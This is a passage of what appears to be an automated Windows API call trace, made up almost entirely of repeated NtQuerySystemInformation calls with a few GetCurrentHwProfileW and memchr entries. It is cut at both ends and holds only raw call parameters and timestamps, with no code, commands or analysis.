(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x28, ResultLength=0x0) [0233.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x20, ResultLength=0x0) [0233.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdda0, Length=0x28, ResultLength=0x0) [0233.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x28, ResultLength=0x0) [0233.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x28, ResultLength=0x0) [0233.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x20, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdda0, Length=0x28, ResultLength=0x0) [0233.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x28, ResultLength=0x0) [0233.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc30, Length=0x18, ResultLength=0x0) [0233.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.783] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x28, ResultLength=0x0) [0233.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x20, ResultLength=0x0) [0233.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdda0, Length=0x28, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x28, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdca0, Length=0x38, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdca0, Length=0x38, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdca0, Length=0x38, ResultLength=0x0) [0233.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x28, ResultLength=0x0) [0233.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x20, ResultLength=0x0) [0233.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.790] GetCurrentHwProfileW (in: lpHwProfileInfo=0xa781ffdcc0 | out: lpHwProfileInfo=0xa781ffdcc0) returned 1 [0233.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x38, ResultLength=0x0) [0233.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x28, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x20, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdda0, Length=0x28, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x28, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdca0, Length=0x38, ResultLength=0x0) [0233.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdca0, Length=0x38, ResultLength=0x0) [0233.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdca0, Length=0x38, ResultLength=0x0) [0233.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x28, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x20, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd88, Length=0x38, ResultLength=0x0) [0233.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.798] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffde98, Length=0x30, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffddd0, Length=0x28, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc70, Length=0x20, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc20, Length=0x20, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x38, ResultLength=0x0) [0233.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x30, ResultLength=0x0) [0233.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x28, ResultLength=0x0) [0233.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x30, ResultLength=0x0) [0233.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd58, Length=0x38, ResultLength=0x0) [0233.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdaf0, Length=0x30, ResultLength=0x0) [0233.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda60, Length=0x28, ResultLength=0x0) [0233.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdaf0, Length=0x30, ResultLength=0x0) [0233.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.804] memchr (_Buf=0x26948aa45c0, _Val=0, _MaxCount=0x1af) returned 0x26948aa45c8 [0233.804] memchr (_Buf=0x26948aa45c9, _Val=0, _MaxCount=0x1a6) returned 0x26948aa45d4 [0233.804] memchr (_Buf=0x26948aa45d5, _Val=0, _MaxCount=0x19a) returned 0x26948aa45e1 [0233.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.805] memchr (_Buf=0x26948aa45fe, _Val=0, _MaxCount=0x171) returned 0x26948aa4606 [0233.805] memchr (_Buf=0x26948aa4607, _Val=0, _MaxCount=0x168) returned 0x26948aa4610 [0233.805] memchr (_Buf=0x26948aa4611, _Val=0, _MaxCount=0x15e) returned 0x26948aa4622 [0233.805] memchr (_Buf=0x26948aa4623, _Val=0, _MaxCount=0x14c) returned 0x26948aa462c [0233.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.806] memchr (_Buf=0x26948aa463d, _Val=0, _MaxCount=0x132) returned 0x26948aa4645 [0233.806] memchr (_Buf=0x26948aa4646, _Val=0, _MaxCount=0x129) returned 0x26948aa464e [0233.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.807] memchr (_Buf=0x26948aa4666, _Val=0, _MaxCount=0x109) returned 0x26948aa466e [0233.807] memchr (_Buf=0x26948aa466f, _Val=0, _MaxCount=0x100) returned 0x26948aa4689 [0233.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdbb0, Length=0x38, ResultLength=0x0) [0233.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.807] memchr (_Buf=0x26948aa46b5, _Val=0, _MaxCount=0xba) returned 0x26948aa46b7 [0233.807] memchr (_Buf=0x26948aa46b8, _Val=0, _MaxCount=0xb7) returned 0x26948aa46c6 [0233.807] memchr (_Buf=0x26948aa46c7, _Val=0, _MaxCount=0xa8) returned 0x26948aa46f1 [0233.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.808] NtQuerySystemInformation (SystemInformationClass=0xb9, 